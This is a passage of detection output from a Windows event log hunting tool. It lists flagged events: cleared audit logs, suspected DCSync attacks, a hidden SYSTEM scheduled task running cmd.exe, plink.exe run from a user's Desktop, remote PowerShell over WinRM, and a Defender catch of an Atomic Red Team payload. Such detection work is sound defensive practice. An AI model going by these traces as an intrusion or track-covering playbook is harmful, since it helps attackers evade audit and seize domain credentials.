006e0529;;RU)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;RU)(OA;CIIO;LCRPLORC;;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;LCRPLORC;;bf967a9c-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;LCRPLORC;;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;05c74c5e-4deb-43b4-bd9f-86664c2a7fd5;;AU)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;ED)(OA;;CR;ccc2dc7d-a6ad-4a7a-8846-c04e3cc53501;;AU)(OA;;CR;280f369c-67c7-438e-ae98-1d46f3c6f541;;AU)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;AU)(OA;OICI;RPWP;3f78c3e5-f79a-46bd-a0b8-9d18116ddc79;;PS)(OA;CIIO;RPWPCR;91e647de-d96f-4b70-9557-d63ff4f3ccd8;;PS)(A;;CCLCSWRPWPLOCRRCWDWO;;;DA)(A;CI;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-738609754-2819869699-4189121830-519)(A;;RPRC;;;RU)(A;CI;LC;;;RU)(A;CI;CCLCSWRPWPLOCRSDRCWDWO;;;BA)(A;;RP;;;WD)(A;;LCRPLORC;;;ED)(A;;LCRPLORC;;;AU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SY)S:(OU;CISA;WP;f30e3bbe-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(OU;CISA;WP;f30e3bbf-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(AU;SA;CR;;;DU)(AU;SA;CR;;;BA)(AU;SA;WPWDWO;;;WD) %%14674 ",DC1.insecurebank.local,Security Audit log cleared,1557594610.60807,2020-09-02T15:47:48.570502+04:00,,Audit,Critical,"User Name : ( IEUser ) with process : ( C:\Python27\python.exe ) run from Unusual location , check the number and date of execution in process execution report",4688," 4688 1 0 13312 0 0x8020000000000000 18196 Security IEWIN7 S-1-5-21-3583694148-1414552638-2922671848-1000 IEUser IEWIN7 0x13765 0x4f0 C:\Python27\python.exe %%1938 0x12c ",01566s-win16-ir.threebeesco.com,Security Process running in Unusual location,1599047268.570502,2019-05-11T21:10:10.608070+04:00,,Threat,High,Audit log cleared by user ( a-jbrown ),1102," 1102 0 4 104 0 0x4020000000000000 2171289 Security 01566s-win16-ir.threebeesco.com S-1-5-21-308926384-506822093-3341789130-1106 a-jbrown 3B 0x38a14 ",IEWIN7,Security Dcsync Attack detected,1553549341.035686,2019-03-26T01:29:01.035686+04:00,,Threat,High,User Name ( bob ) is suspected doing dcsync attack ,5136," 5136 0 0 14081 0 0x8020000000000000 198242605 Security DC1.insecurebank.local 9F3DCF8F-49DF-4DB9-AA5F-09B804ADDD96 - S-1-5-21-738609754-2819869699-4189121830-1108 bob insecurebank 0x40f2719 insecurebank.local %%14676 DC=insecurebank,DC=local C6FAF700-BFE4-452A-A766-424F84C29583 domainDNS nTSecurityDescriptor 2.5.5.15 O:BAG:BAD:AI(OA;CIIO;RP;4c164200-20c0-11d0-a768-00aa006e0529;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;3e0f7e18-2c7a-4c10-ba82-4d926db99a3e;;S-1-5-21-738609754-2819869699-4189121830-522)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1120)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1120)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-498)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;DD)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1120)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a86-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a9c-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967aba-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;WP;ea1b7b93-5e48-46d5-bc6c-4df4fda78a35;bf967a86-0de6-11d0-a285-00aa003049e2;PS)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;BA)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;e2a36dc9-ae17-47c3-b58b-be34c55ba633;;S-1-5-32-557)(OA;;RP;c7407360-20bf-11d0-a768-00aa006e0529;;RU)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;RU)(OA;CIIO;LCRPLORC;;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;LCRPLORC;;bf967a9c-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;LCRPLORC;;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;05c74c5e-4deb-43b4-bd9f-86664c2a7fd5;;AU)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;ED)(OA;;CR;ccc2dc7d-a6ad-4a7a-8846-c04e3cc53501;;AU)(OA;;CR;280f369c-67c7-438e-ae98-1d46f3c6f541;;AU)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;AU)(OA;OICI;RPWP;3f78c3e5-f79a-46bd-a0b8-9d18116ddc79;;PS)(OA;CIIO;RPWPCR;91e647de-d96f-4b70-9557-d63ff4f3ccd8;;PS)(A;;CCLCSWRPWPLOCRRCWDWO;;;DA)(A;CI;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-738609754-2819869699-4189121830-519)(A;;RPRC;;;RU)(A;CI;LC;;;RU)(A;CI;CCLCSWRPWPLOCRSDRCWDWO;;;BA)(A;;RP;;;WD)(A;;LCRPLORC;;;ED)(A;;LCRPLORC;;;AU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SY)S:(OU;CISA;WP;f30e3bbe-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(OU;CISA;WP;f30e3bbf-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(AU;SA;CR;;;DU)(AU;SA;CR;;;BA)(AU;SA;WPWDWO;;;WD) %%14674 ",DC1.insecurebank.local,Security Audit log cleared,1557594610.342445,2019-05-11T21:10:10.342445+04:00,,Audit,Critical,Audit log cleared by user ( IEUser ),1102," 1102 0 4 104 0 0x4020000000000000 18195 Security IEWIN7 S-1-5-21-3583694148-1414552638-2922671848-1000 IEUser IEWIN7 0x1371b ",IEWIN7,Security Dcsync Attack detected,1553549325.02663,2019-03-26T01:28:45.026630+04:00,,Threat,High,User Name ( bob ) is suspected doing dcsync attack ,5136," 5136 0 0 14081 0 0x8020000000000000 198242604 Security DC1.insecurebank.local 9F3DCF8F-49DF-4DB9-AA5F-09B804ADDD96 - S-1-5-21-738609754-2819869699-4189121830-1108 bob insecurebank 0x40f2719 insecurebank.local %%14676 DC=insecurebank,DC=local C6FAF700-BFE4-452A-A766-424F84C29583 domainDNS nTSecurityDescriptor 2.5.5.15 O:BAG:BAD:AI(OA;CIIO;RP;4c164200-20c0-11d0-a768-00aa006e0529;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;3e0f7e18-2c7a-4c10-ba82-4d926db99a3e;;S-1-5-21-738609754-2819869699-4189121830-522)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1120)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-498)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;DD)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1120)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a86-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a9c-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967aba-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;WP;ea1b7b93-5e48-46d5-bc6c-4df4fda78a35;bf967a86-0de6-11d0-a285-00aa003049e2;PS)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;BA)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;e2a36dc9-ae17-47c3-b58b-be34c55ba633;;S-1-5-32-557)(OA;;RP;c7407360-20bf-11d0-a768-00aa006e0529;;RU)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;RU)(OA;CIIO;LCRPLORC;;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;LCRPLORC;;bf967a9c-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;LCRPLORC;;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;05c74c5e-4deb-43b4-bd9f-86664c2a7fd5;;AU)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;ED)(OA;;CR;ccc2dc7d-a6ad-4a7a-8846-c04e3cc53501;;AU)(OA;;CR;280f369c-67c7-438e-ae98-1d46f3c6f541;;AU)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;AU)(OA;OICI;RPWP;3f78c3e5-f79a-46bd-a0b8-9d18116ddc79;;PS)(OA;CIIO;RPWPCR;91e647de-d96f-4b70-9557-d63ff4f3ccd8;;PS)(A;;CCLCSWRPWPLOCRRCWDWO;;;DA)(A;CI;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-738609754-2819869699-4189121830-519)(A;;RPRC;;;RU)(A;CI;LC;;;RU)(A;CI;CCLCSWRPWPLOCRSDRCWDWO;;;BA)(A;;RP;;;WD)(A;;LCRPLORC;;;ED)(A;;LCRPLORC;;;AU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SY)S:(OU;CISA;WP;f30e3bbe-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(OU;CISA;WP;f30e3bbf-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(AU;SA;CR;;;DU)(AU;SA;CR;;;BA)(AU;SA;WPWDWO;;;WD) %%14675 ",DC1.insecurebank.local,Security Dcsync Attack detected,1553549325.02663,2019-03-26T01:28:45.026630+04:00,,Threat,High,User Name ( bob ) is suspected doing dcsync attack ,5136," 5136 0 0 14081 0 0x8020000000000000 198242603 Security DC1.insecurebank.local 98E50F6A-AE61-4BFF-A9F0-CCFA5CCB555C - S-1-5-21-738609754-2819869699-4189121830-1108 bob insecurebank 0x40f2719 insecurebank.local %%14676 DC=insecurebank,DC=local C6FAF700-BFE4-452A-A766-424F84C29583 domainDNS nTSecurityDescriptor 2.5.5.15 O:BAG:BAD:AI(OA;CIIO;RP;4c164200-20c0-11d0-a768-00aa006e0529;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;3e0f7e18-2c7a-4c10-ba82-4d926db99a3e;;S-1-5-21-738609754-2819869699-4189121830-522)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1120)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-498)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;DD)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1120)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a86-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a9c-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967aba-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;WP;ea1b7b93-5e48-46d5-bc6c-4df4fda78a35;bf967a86-0de6-11d0-a285-00aa003049e2;PS)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;BA)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;e2a36dc9-ae17-47c3-b58b-be34c55ba633;;S-1-5-32-557)(OA;;RP;c7407360-20bf-11d0-a768-00aa006e0529;;RU)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;RU)(OA;CIIO;LCRPLORC;;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;LCRPLORC;;bf967a9c-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;LCRPLORC;;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;05c74c5e-4deb-43b4-bd9f-86664c2a7fd5;;AU)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;ED)(OA;;CR;ccc2dc7d-a6ad-4a7a-8846-c04e3cc53501;;AU)(OA;;CR;280f369c-67c7-438e-ae98-1d46f3c6f541;;AU)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;AU)(OA;OICI;RPWP;3f78c3e5-f79a-46bd-a0b8-9d18116ddc79;;PS)(OA;CIIO;RPWPCR;91e647de-d96f-4b70-9557-d63ff4f3ccd8;;PS)(A;;CCLCSWRPWPLOCRRCWDWO;;;DA)(A;CI;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-738609754-2819869699-4189121830-519)(A;;RPRC;;;RU)(A;CI;LC;;;RU)(A;CI;CCLCSWRPWPLOCRSDRCWDWO;;;BA)(A;;RP;;;WD)(A;;LCRPLORC;;;ED)(A;;LCRPLORC;;;AU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SY)S:(OU;CISA;WP;f30e3bbe-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(OU;CISA;WP;f30e3bbf-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(AU;SA;CR;;;DU)(AU;SA;CR;;;BA)(AU;SA;WPWDWO;;;WD) %%14674 ",DC1.insecurebank.local,Security Audit log cleared,1552907189.911579,2019-03-18T15:06:29.911579+04:00,,Audit,Critical,schedule task created by user,4698," 4698 0 0 12804 0 0x8020000000000000 566836 Security WIN-77LTAPHIQ1R.example.corp S-1-5-21-1587066498-1489273250-1035260531-500 Administrator EXAMPLE 0x17e2d2 \CYAlyNSS <?xml version="1.0" encoding="UTF-16"?> <Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task"> <Triggers> <CalendarTrigger> <StartBoundary>2015-07-15T20:35:13.2757294</StartBoundary> <Enabled>true</Enabled> <ScheduleByDay> <DaysInterval>1</DaysInterval> </ScheduleByDay> </CalendarTrigger> </Triggers> <Principals> <Principal id="LocalSystem"> <UserId>S-1-5-18</UserId> <RunLevel>HighestAvailable</RunLevel> <LogonType>InteractiveToken</LogonType> </Principal> </Principals> <Settings> <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy> <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries> <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries> <AllowHardTerminate>true</AllowHardTerminate> <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable> <IdleSettings> <StopOnIdleEnd>true</StopOnIdleEnd> <RestartOnIdle>false</RestartOnIdle> </IdleSettings> <AllowStartOnDemand>true</AllowStartOnDemand> <Enabled>true</Enabled> <Hidden>true</Hidden> <RunOnlyIfIdle>false</RunOnlyIfIdle> <WakeToRun>false</WakeToRun> <ExecutionTimeLimit>P3D</ExecutionTimeLimit> <Priority>7</Priority> </Settings> <Actions Context="LocalSystem"> <Exec> <Command>cmd.exe</Command> <Arguments>/C tasklist > %windir%\Temp\CYAlyNSS.tmp 2>&1</Arguments> </Exec> </Actions> </Task> ",PC01.example.corp,Security schedule task created,1552953724.335561,2019-03-19T04:02:04.335561+04:00,,Audit,High,Audit log cleared by user ( user01 ),1102," 1102 0 4 104 0 0x4020000000000000 432901 Security PC01.example.corp S-1-5-21-1587066498-1489273250-1035260531-1106 user01 EXAMPLE 0x18a7875 ",WIN-77LTAPHIQ1R.example.corp,Security network share object was added,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,High,network share object was added,5142," 5142 0 0 12808 0 0x8020000000000000 6273 Security PC04.example.corp S-1-5-21-3583694148-1414552638-2922671848-1000 IEUser PC04 0x128a9 \\*\PRINT c:\windows\system32 ",PC04.example.corp,Security Audit log cleared,1552953724.179623,2019-03-19T04:02:04.179623+04:00,,Audit,Critical,Audit log cleared by user ( IEUser ),1102," 1102 0 4 104 0 0x4020000000000000 566821 Security WIN-77LTAPHIQ1R.example.corp S-1-5-21-1587066498-1489273250-1035260531-500 administrator EXAMPLE 0x4fd77 ",WIN-77LTAPHIQ1R.example.corp,Security Audit log cleared,1552851030.324836,2019-03-17T23:30:30.324836+04:00,,Audit,Critical,Audit log cleared by user ( administrator ),1102," 1102 0 4 104 0 0x4020000000000000 6272 Security PC04.example.corp S-1-5-21-3583694148-1414552638-2922671848-1000 IEUser PC04 0x128a9 ",PC04.example.corp,Security Audit log cleared,1552951423.570212,2019-03-19T03:23:43.570212+04:00,,Audit,Critical,Audit log cleared by user ( administrator ),1102," 1102 0 4 104 0 0x4020000000000000 565591 Security WIN-77LTAPHIQ1R.example.corp S-1-5-21-1587066498-1489273250-1035260531-500 administrator EXAMPLE 0x4fd77 ",WIN-77LTAPHIQ1R.example.corp,Security Audit log cleared,1547969410.645116,2019-01-20T11:30:10.645116+04:00,,Audit,Critical,Audit log cleared by user ( Administrator ),1102," 1102 0 4 104 0 0x4020000000000000 32950 Security WIN-77LTAPHIQ1R.example.corp S-1-5-21-1587066498-1489273250-1035260531-500 Administrator EXAMPLE 0x35312 ",WIN-77LTAPHIQ1R.example.corp,Security Audit log cleared,1547967656.784849,2019-01-20T11:00:56.784849+04:00,,Audit,Critical,Audit log cleared by user ( Administrator ),1102," 1102 0 4 104 0 0x4020000000000000 32853 Security WIN-77LTAPHIQ1R.example.corp S-1-5-21-1587066498-1489273250-1035260531-500 Administrator EXAMPLE 0x35312 ",WIN-77LTAPHIQ1R.example.corp,Security Audit log cleared,1600193079.987052,2020-09-15T22:04:39.987052+04:00,,Audit,Critical,Audit log cleared by user ( IEUser ),1102," 1102 0 4 104 0 0x4020000000000000 161471 Security MSEDGEWIN10 S-1-5-21-3461203602-4096304019-2269080069-1000 IEUser MSEDGEWIN10 0x52a7d ",MSEDGEWIN10,Security Audit log cleared,1552908425.42562,2019-03-18T15:27:05.425620+04:00,,Audit,Critical,Audit log cleared by user ( user01 ),1102," 1102 0 4 104 0 0x4020000000000000 433307 Security PC01.example.corp S-1-5-21-1587066498-1489273250-1035260531-1106 user01 EXAMPLE 0x18a7875 ",PC01.example.corp,Security Suspicious Command or process found in the log,1550081008.338519,2019-02-13T22:03:28.338519+04:00,,Threat,Critical,Found a log contain suspicious command or process ( plink.exe),4688," 4688 1 0 13312 0 0x8020000000000000 227714 Security PC01.example.corp S-1-5-21-1587066498-1489273250-1035260531-1106 user01 EXAMPLE 0x2ed80 0xcfc C:\Users\user01\Desktop\plink.exe %%1936 0xe60 ",PC01.example.corp,Security Process running in Unusual location,1550081008.338519,2019-02-13T22:03:28.338519+04:00,,Threat,High,"User Name : ( user01 ) with process : ( C:\Users\user01\Desktop\plink.exe ) run from Unusual location , check the number and date of execution in process execution report",4688," 4688 1 0 13312 0 0x8020000000000000 227714 Security PC01.example.corp S-1-5-21-1587066498-1489273250-1035260531-1106 user01 EXAMPLE 0x2ed80 0xcfc C:\Users\user01\Desktop\plink.exe %%1936 0xe60 ",PC01.example.corp,Security Audit log cleared,1550080907.51234,2019-02-13T22:01:47.512340+04:00,,Audit,Critical,Audit log cleared by user ( admin01 ),1102," 1102 0 4 104 0 0x4020000000000000 227693 Security PC01.example.corp S-1-5-21-1587066498-1489273250-1035260531-1108 admin01 EXAMPLE 0xaf855 ",PC01.example.corp,Security connection is initiated using WinRM to this machine - Powershell remoting,-11644473600.0,1601-01-01T04:00:00+04:00,,Audit,High,User (S-1-5-21-738609754-2819869699-4189121830-500) Connected to this machine using WinRM - powershell remote - check eventlog viewer,91," 91 0 4 9 0 0x4000000000000004 508 Microsoft-Windows-WinRM/Operational DC1.insecurebank.local 15005 shellId 68007400740070003A002F002F0073006300680065006D00610073002E006D006900630072006F0073006F00660074002E0063006F006D002F007700620065006D002F00770073006D0061006E002F0031002F00770069006E0064006F00770073002F007300680065006C006C002F0063006D0064000000 ",DC1.insecurebank.local,Microsoft-Windows-WinRM/Operational Windows Defender took action against Malware,1563483223.034598,2019-07-19T00:53:43.034598+04:00,,Threat,Critical,"Windows Defender took action against Malware - details : Severity ( Severe ) , Name ( Trojan:XML/Exeselrun.gen!A ) , Action ( 6 ) , Catgeory ( Trojan ) , Path ( file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1086\payloads\test.xsl ) , Process Name ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) , User ( NT AUTHORITY\SYSTEM ) ",1117," 1117 0 4 0 0 0x8000000000000000 106 Microsoft-Windows-Windows Defender/Operational MSEDGEWIN10 %%827 4.18.1906.3 {8791B1FB-0FE7-412E-B084-524CB5A221F3} 2019-07-18T20:40:13.775Z 2147735426 Trojan:XML/Exeselrun.gen!A 5 Severe 8 Trojan https://go.microsoft.com/fwlink/?linkid=37020&name=Trojan:XML/Exeselrun.gen!A&threatid=2147735426&enterprise=0 5 2 3 %%818 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 